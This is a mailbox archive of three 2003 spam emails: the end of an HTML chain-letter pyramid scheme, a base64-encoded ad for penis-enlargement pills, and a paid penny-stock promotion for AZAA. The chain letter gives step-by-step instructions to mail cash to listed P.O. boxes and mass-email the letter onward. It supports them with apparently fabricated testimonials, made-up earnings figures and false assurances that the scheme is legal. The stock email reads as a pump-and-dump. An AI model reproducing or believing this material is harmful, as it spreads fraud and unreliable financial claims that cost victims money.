described below, to see if it really can make people money. The show also
investigated whether or not the program was legal.</font>
<p><font face=3D"Arial">Their findings proved once and for all that there
are ''absolutely NO Laws prohibiting the participation in the program and
if people can "follow the simple instruction" they are bound to make some
mega bucks with only $25 out of pocket cost''.</font>
<p><font face=3D"Arial">DUE TO THE RECENT INCREASE OF POPULARITY &amp; RES=
PECT
THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.</font=
>
<p><font face=3D"Arial">This is what one had to say:&nbsp;</font>
<blockquote>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"400" BGCOLO=
R=3D"#FFFFCC" >
<tr>
<td>
<i><font face=3D"Arial"><font color=3D"#3366FF">''Thanks to this
profitable opportunity". I was approached many times before but each time
I passed on it. I am so glad I finally joined just to see what one could
expect in return for the minimal effort and money required. To my astonish=
ment,
I received a total $ 610,470.00 in 21 weeks, with money still coming in''.=
</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>Pam =
Hedland</font></font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>For=
t Lee,
New Jersey.</font></font></font></i></b>
</td>
</tr>
</table></center>

</blockquote>
</blockquote>

<hr width=3D"600" noshade=3D"noshade">
<blockquote><font face=3D"Arial">Another said:</font>
<blockquote>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"400" BGCOLO=
R=3D"#FFFFCC" >
<tr>
<td>
<i><font face=3D"Arial"><font color=3D"#3366FF">"This program has
been around for a long time but I never believed in it. But one day when
I received this again in the mail I decided to gamble my $25 on it. I foll=
owed
the simple instructions and Wa-laa ..... 3 weeks later the money started
to come in. First month I only made $240.00 but the next 2 months after
that I made a total of $290,000.00. So far, in the past 8 months by re-ent=
ering
the program, I have made over $710,000.00 and I am playing it again. The
key to success in this program is to follow the simple steps and NOT chang=
e
anything."</font></font></i></td>
</tr>
</table></center>
</blockquote>

<p><br><font face=3D"Arial">More testimonials later but first...</font></b=
lockquote>
</blockquote>

<center><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENCE</=
font></b></center>

<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to
make at least $500,000 every 4 to 5 months easily and</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000">comfortably, please re=
ad
the following...THEN READ IT AGAIN and AGAIN !!!</font></font></b></center=
>

<hr width=3D"85%">
<center>
<p><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fon=
t></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>

<blockquote>
<blockquote><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>=

<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font></blockquote>
</blockquote>

<center>
<p><br><b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>=

<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You will need all 5 reports so that you
can save them on your computer and resell them.</font>
<center>
<p><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>

<p><font face=3D"Arial">Within a few days <b>you will receive, via e-mail,=

each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<p><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will loose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!</u></b></fon=
t></blockquote>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"90=
%" BGCOLOR=3D"#FFCC33" >
<tr>
<td>
<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b></=
center>
</td>
</tr>
</table></center>

<center>&nbsp;
<br><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such an=
d
you will be VERY profitable in a short period of time</font></font></i></b=
></center>
</blockquote>

<blockquote>
<blockquote><font face=3D"Arial">After you have ordered all 5 reports, tak=
e
this advertisement and REMOVE the name &amp; address of the person in REPO=
RT
# 5. This person has made it through the cycle and is no doubt counting
their fortune. Email them and ask that's what I always did.Move the name
&amp; address in REPORT # 4 down TO REPORT # 5.Move the name &amp; address=

in REPORT # 3 down TO REPORT # 4.Move the name &amp; address in REPORT
# 2 down TO REPORT # 3.Move the name &amp; address in REPORT # 1 down TO
REPORT # 2Insert YOUR name &amp; address in the REPORT # 1 Position.</font=
></blockquote>

<center>
<p><br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &a=
mp;
address <b>ACCURATELY</b></font>
<br><font face=3D"Arial">(Just cut and paste! This is critical to <b>YOUR
</b>success.</font></center>
</blockquote>

<center><font face=3D"Arial">Take this entire letter, with the modified li=
st
of names, and save it on your computer.</font>
<p><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cente=
r>

<blockquote>
<blockquote><font face=3D"Arial"><b>Save this on a disk as well just in ca=
se
if you loose any data</b>. To assist you with marketing your business on
the internet, the 5 reports you purchase will provide you with invaluable
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font></blockquote>
</blockquote>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1 WIDTH=3D"54=
0" >
<tr>
<td>
<center><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY=
</font></b></center>
<font face=3D"Arial"></font>
<p><br><font face=3D"Arial"></font>
<p><font face=3D"Arial">Let's say that you decide to start small, just to
see how it goes, and we will assume You and those involved send out only
5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font>

<p><center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1=
>NUMBERS DO NOT LIE</font></font></font></b></center>

<p><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>GET
A PENCIL &amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
MATTER HOW YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did
it was $55,000 in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font>
</td>
</tr>
</table></center>

<center><font face=3D"Arial">&nbsp;</font></center>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"540" >
<tr>
<td>
<center><b><font face=3D"Arial">METHOD # 2: BY PLACING FREE ADS ON THE INT=
ERNET</font></b></center>
<b><font face=3D"Arial"></font></b>
<p><font face=3D"Arial">Advertising on the net is very, very inexpensive
and there are hundreds of FREE places to advertise. Placing a lot of free
ads on the Internet will easily get a larger response. We strongly suggest=

you start with Method # 1 and add METHOD #2 as you go along. For every
$5 you receive, all you must do is e-mail them the Report they ordered.
That's it. Always provide same day service on all orders.</font>
<p><font face=3D"Arial">This will guarantee that the e-mail they send out,=

with your name and address on it, will be prompt because they can not adve=
rtise
until they receive the report.</font>
<p><font face=3D"Arial">The reason for the "cash" is not because this is
illegal or somehow "wrong". It is simply about time. Time for checks or
credit cards to be cleared or approved, etc. Concealing it is simply so
no one can SEE there is money in the envelope and steal it before it gets
to you.</font></td>
</tr>
</table></center>
<font face=3D"Arial"></font>
<blockquote>
<blockquote>
<center><b><font face=3D"Arial">&nbsp;</font></b>
<br><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONL=
Y</b>.</font></center>

<font face=3D"Arial"><b>Notes: </b>Always send $5 cash (U.S.
CURRENCY) for each Report. Checks NOT accepted. Make sure the cash is conc=
ealed
by wrapping it in at least 2 sheets of paper or foil will also work. On
one of those sheets of paper, write the NUMBER &amp; the NAME of the Repor=
t
you are ordering, YOUR E-MAIL ADDRESS and your name and postal address.</f=
ont>
</blockquote>
</blockquote>

<BR><center><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</fon=
t></font></b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<p>
<center><table BORDER=3D2 WIDTH=3D"80%" class=3D"center" >
<tr>
<td WIDTH=3D"30%" BGCOLOR=3D"#FF0000" class=3D"left">&nbsp;</td>

<td>
<br><b><font face=3D"Arial">REPORT #1:&nbsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>C. Bernerd</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 319</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b></blockquote>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>Sheilah W</font></font=
></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 297</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b></blockquote>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>NetWiz Rds</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>PO Box 025216, Apt SJO3016</fo=
nt></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Miami, FL 33102</font></font><=
/b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>Steve W</font></font><=
/b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 115-3016</font></font=
></b>
<br><b><font face=3D"Arial"><font size=3D-1>San Rafael de Heredia</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Costa Rica</font></font></b></=
blockquote>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:&nbsp;</f=
ont></font></b>
<blockquote><b><font face=3D"Arial,Helvetica"><font size=3D-1>M. Eiseman</=
font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>P.O. Box 451971</fon=
t></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Sunrise, FL 33345-19=
71</font></font></b></blockquote>
</td>
</tr>
</table></center>

<blockquote>
<blockquote>
<center><b><font face=3D"Arial"><font size=3D+0>There are currently more t=
han
570,000,000 people online worldwide!</font></font></b></center>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$=
$$$$$
YOUR SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>

<blockquote><font face=3D"Arial">Follow these guidelines to guarantee your=

success:</font>
<p><font face=3D"Arial">If you do not receive at least 10 orders for Repor=
t
#1 within 2 weeks, continue sending e-mails until you do.</font>
<p><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks af=
ter
that you should receive 100 orders or more for REPORT # 2. If you did not,=

continue advertising or sending e-mails until you do.</font>
<p><font face=3D"Arial">**Once you have received 100 or more orders for Re=
port#
2, YOU CAN RELAX, because the system is already working for you, and the
cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Every time
your name is moved down on the list, you are placed in front of a Differen=
t
report.</font>
<p><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching wh=
ich
report people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME
SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There
is NO LIMIT to the income you can generate from this business!!!</font></b=
lockquote>
</blockquote>

<center><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF=

THIS PROGRAM:</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You have just received information that
can give you financial freedom for the rest of your life, with NO RISK
and JUST A LITTLE BIT OF EFFORT. You can make more money in the next few
weeks and months than you have ever imagined. Follow the program EXACTLY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...)</font>
<p><font face=3D"Arial">Remember though, the more you send out the more po=
tential
customers you will reach. So my friend, I have given you the ideas, inform=
ation,
materials and opportunity to become financially independent. IT IS UP TO
YOU NOW!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font size=3D+2>MORE TESTIMONIALS</font></=
font></b></center>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1 WIDTH=3D"40=
0" BGCOLOR=3D"#FFFFCC" >
<tr>
<td><i><font face=3D"Arial"><font color=3D"#3366FF">"My name is Mitchell. =
My
wife, Jody and I live in Chicago. I am an accountant with a major U.S.Corp=
oration
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Mitchell Wolf M.D.,<=
/font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Chicago, Illinois</=
font></font></i></b></td>
</tr>
</table></center>
&nbsp;
<blockquote>
<center>
<hr WIDTH=3D"400"></center>

<blockquote>
<blockquote>
<center><i><font face=3D"Arial"><font color=3D"#3366FF">&nbsp;</font></fon=
t></i></center>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"400" BGCOLO=
R=3D"#FFFFCC" >
<tr>
<td><i><font face=3D"Arial"><font color=3D"#3366FF">"Not being the gamblin=
g
type, it took me several weeks to make up my mind to participate in this
plan. But conservative as I am, I decided that the initial investment was
so little that there was just no way that I wouldn't get enough orders
to at least get my money back. I was surprised when I found my medium size=

post office box crammed with orders. I made $319,210.00 in the first 12
weeks. The nice thing about this deal is that it does not matter where
people live. There simply isn't a better investment with a faster return
and so big".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Dan Sondstrom,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Alberta, Canada</fo=
nt></font></i></b></td>
</tr>
</table></center>

<center><i><font face=3D"Arial"><font color=3D"#3366FF">&nbsp;</font></fon=
t></i></center>
</blockquote>
</blockquote>
</blockquote>

<hr WIDTH=3D"400">
<center>&nbsp;</center>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"400" BGCOLO=
R=3D"#FFFFCC" >
<tr>
<td><i><font face=3D"Arial"><font color=3D"#3366FF">"I had received this p=
rogram
before. I deleted it, but later I wondered if I should have given it a
try. Of course, I had no idea who to contact to get another copy, so I
had to wait until I was e-mailed again by someone else........11 months
passed then it luckily came again...... I did not delete this one! I made
more than $490,000 on my first try and all the money came within 22 weeks"=
</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Susan De Suza,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">New York, N.Y.</fon=
t></font></i></b></td>
</tr>
</table></center>
&nbsp;
<br>
<hr WIDTH=3D"400">
<blockquote>
<blockquote>
<blockquote>
<center><i><font face=3D"Arial"><font color=3D"#3366FF">&nbsp;</font></fon=
t></i></center>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"400" BGCOLO=
R=3D"#FFFFCC" >
<tr>
<td><i><font face=3D"Arial"><font color=3D"#3366FF">"It really is a great =
opportunity
to make relatively easy money with little cost to you. I followed the simp=
le
instructions carefully and within 10 days the money started to come in.
My first month I made $ 20,560.00 and by the end of third month my total
cash count was $ 362,840.00. Life is beautiful, Thanx to the internet".</f=
ont></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Fred Dellaca,</font>=
</font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Westport, New Zeala=
nd</font></font></i></b></td>
</tr>
</table></center>

<center><i><font face=3D"Arial"><font color=3D"#3366FF">&nbsp;&nbsp;</font=
></font></i>
<hr WIDTH=3D"400"></center>
</blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<br><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></fon=
t></b></center>
</blockquote>

<center><i><font face=3D"Arial"><font size=3D-1>If you have any questions =
as
to the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<p>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>This =
message
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://biogenusa.biz/nomo=
re.html">remove
link here</a></font></font></font></center>

</body>
</html>
p pyjmwo gbiu
pmdqggqndzly ueuib
vbm 
kwiv
t   sgotmj 
fl

--_E.5A.EB_66D4E--


From baarontinsley@gte.net Wed Nov  5 05:50:14 2003
Return-Path: <baarontinsley@gte.net>
Received: from BHK01 (3E6B9E2E.rev.stofanet.dk [62.107.158.46])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA5AoDRY002619
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 5 Nov 2003 05:50:13 -0500 (EST)
Message-Id: <200311051050.hA5AoDRY002619@netlib2.cs.utk.edu>
From: "bdatacon1@email.com" <baarontinsley@gte.net>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: enlarge your penis by a few more inches, and wider too!
Date: Wed, 5 Nov 2003 11:53:12 +0100
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQoNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+bmE8L3RpdGxlPg0KPC9oZWFkPg0KPGJv
ZHkgdG9wbWFyZ2luPSIwIiBiZ2NvbG9yPSIjMDAwMDAwIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+
PGJyPjxmanNkaWFvZmRzPg0KPHRhYmxlIHdpZHRoPTUwMHB4Pg0KPHRyPg0KPHRkIGJnY29sb3I9
Im5hdnkiIGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9InZlcmRhbmEiIHNpemU9MiBjb2xvcj0i
eWVsbG93Ij4xMDAlIEd1YXJhbnRlZWQgUmVzdWx0cyBPciBZb3VyIE1vbmV5IEJhY2sNCjwvdHI+
DQo8dHI+PHRkIGJnY29sb3I9ImJsdWUiIGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9InZlcmRh
bmEiIHNpemU9NCBjb2xvcj0id2hpdGUiPjxiPg0KPGJyPg0KTGlrZSBiaWcgdGl0cz8gR2lybHMg
bGlrZSBiaWcgZGlja3MhIGlmIHlvdSBkb24ndCBoYXZlIG9uZSBHRVQgT05FLjxicj48YnI+DQo8
IS0tIGZqc2RpYW9mZHMgLS0+DQpIb3cgd291bGQgeW91IGZlZWwgaGF2aW5nIGEgZmV3IGV4dHJh
IGluY2hlcywgYW5kIGEgYmlnIGFuZCBjb21tYW5kaW5nIHBlbmlzPzxicj48YnI+DQpPdXIgcGVu
aXMgcGlsbHMgYXJlIEdVQVJBTlRFRUQgdG8gd29yayBhbmQgeW91IGNvdWxkIGJlIHdhbGtpbmcg
YXJvdW5kIHBhY2tpbmcgaGVhdCB3aXRoaW4gMyBtb250aHMhPGJyPjxicj4NCjxBIGhyZWY9Imh0
dHA6Ly90b3lvdGFAd3d3LmhlcmJhbHVzYS5iaXovd2hpdGVsaW5lL3ZwLz9manNkaWFvZmRzIj48
Zm9udCBjb2xvcj0ieWVsbG93Ij5UYWtlIGEgbG9vayBhdCBob3cgaXQgd29ya3M8L2E+PGJyPjxi
cj4NCjwvdGQ+PC90cj4NCjx0cj4NCjx0ZCBiZ2NvbG9yPSJuYXZ5IiBhbGlnbj0iY2VudGVyIj48
Zm9udCBmYWNlPSJ2ZXJkYW5hIiBzaXplPTIgY29sb3I9InllbGxvdyI+V29ybGRzIE1vc3QgRWZm
ZWN0aXZlIEVubGFyZ2VtZW50IFRlY2huaXF1ZQ0KPC90cj4NCjwvdGFibGU+PGZqc2RpYW9mZHM+
DQo8YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPg0KPGZvbnQgc2l6ZT0iMXB4IiBmYWNl
PSJ2ZXJkYW5hIiBjb2xvcj0iIzAwMDAwIj5manNkaWFvZmRzIGZqc2RpYW9mZHMgZmpzZGlhb2Zk
czwvZm9udD4NCjxmanNkaWFvZmRzPg0KPGEgaHJlZj0iaHR0cDovL3RveW90YUB3d3cuaGVyYmFs
dXNhLmJpei93aGl0ZWxpbmUvb3V0Lmh0bWwiPjxmb250IGNvbG9yPSJ5ZWxsb3ciIHNpemU9IjIi
PnRvIGdldCBvZmY8L2E+DQo8L2JvZHk+DQo8L2h0bWw+DQo=


From zo97lp@yahoo.com Wed Nov  5 21:29:42 2003
Return-Path: <zo97lp@yahoo.com>
Received: from cpe-65-26-140-156.kc.rr.com (CPE-65-26-140-156.kc.rr.com [65.26.140.156])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA62TZRY027543
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 5 Nov 2003 21:29:38 -0500 (EST)
Received: from (HELO 9yljc) [144.67.100.101] by cpe-65-26-140-156.kc.rr.com; Thu, 06 Nov 2003 04:24:40 +0200
Message-ID: <9$$f9-jm-z-h@6kwq44>
From: "Gabriela Cameron" <zo97lp@yahoo.com>
Reply-To: "Gabriela Cameron" <zo97lp@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: US Stock Market: AZAA - Military Aircraft Related Stock... lzx ilxs xfqpuaxwb
Date: Thu, 06 Nov 03 04:24:40 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3AEACF27AD29"
X-Priority: 3
X-MSMail-Priority: Normal


--3AEACF27AD29
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

US Stock Market - UP On the NEWS...AZAA

BREAKING NEWS - TUCSON, Ariz.--(BUSINESS WIRE)--Arizona Aircraft Spares, I=
nc. (OTCBB: AZAA) - one of the leading military aircraft spare parts manuf=
acturers - announces it has signed a letter of commitment with Wolfe and T=
urner Investments to obtain a 6 million dollar non-equity asset-backed loa=
n. The loan would have a ten-year term with a 25-year amortization schedul=
e. AZAA is currently completing the due diligence phase and anticipates th=
at funding will occur prior to December 1, 2003.

Despite the current boost in government military spending, aircraft used b=
y the US Air Force and other armed forces are now older than
ever=FFFFFF9723 yea=
rs on average.  B-52's are older than their pilots, with no plans to build=
 new bombers for the next 10 years.  Result: Aging aircraft require ever-i=
ncreasing amounts of expensive maintenance, repairs and replacement parts.=


Arizona Aircraft Spares' market potential is measured in billions of dolla=
rs. The company works directly with the U.S. Government and other internat=
ional world governments. The proposed U.S. military budget alone is 399.1 =
billion-dollars, of which twenty-five percent is allocated for spare parts=
 and ground support systems.

Arizona Aircraft Spares focuses exclusively on manufacturing military airc=
raft spare parts. The majority of the company's business comes from the U.=
S. Government =FFFFFF96 the Army, Navy and Air Force branches of the U.S.
Milita=
ry. Working with the U.S. Military represents the least cash intensive gro=
wth strategy for the company, as the government systematically pays within=
 30 days after the company has shipped the product. Furthermore, Arizona A=
ircraft Spares is eligible for the =FFFFFF93Progressive Payment=FFFFFF94
program where=
by the company can collect upwards of 80% of the contract's total value pr=
ior to completion of the contract.

AZAA has worked with over 20 international governments and continues to ma=
intain international clients apart from the U.S. Government. All other ord=
ers are required to put an upfront deposit on all contracts awarded. Arizo=
na Aircraft Spares as a public company can take full advantage of the oppo=
rtunities in the international markets with enhanced liquidity to execute =
larger international projects.

Arizona Aircraft Spares, Inc. works primarily with the U.S. Government, fo=
cusing exclusively on the Army, Navy and Air Force branches of the U.S. Mi=
litary as well as foreign ally countries.  The company receives its contra=
cts from the Department of Defense Logistics Services located in either Ri=
chmond, Virginia or Columbus, Ohio. These two sites represent the central =
purchasing group for U.S. Government military contracts, and the point of =
origin for all U.S. military bids and contracts.

On average, Arizona Aircraft Spares receives over 600 requests to bid on U=
S. military spare parts every week. Occasionally, Arizona Aircraft Spares=
 receives orders from other U.S. Government Prime Contractors, such as Boe=
ing and Northrop Grumman. This typically happens in situations when these =
companies surmise that Arizona Aircraft Spares can provide the spare parts=
 at a better cost efficiency than them.

To find out more, go to: www.arizonaaircraftspares.com


AZAA IS IN NO WAY associated with this newsletter.




This is for information puposes only. Penny stocks are considered to be hi=
ghly speculative and may be unsuitable for all but very aggressive investo=
rs.  We do not hold or plan to hold a position in this stock.  This Profil=
e was a paid advertisement by a third party not affiliated with the profil=
ed company.  We were compensated 3000 dollars to distribute this report on=
ly. Please always consult a registered financial advisor before making any=
 decisions.  This report is for entertainment and advertising purposes onl=
y and should not be used as investment advice.




No more advertising: www.relar33.com


















g f qrebprplx

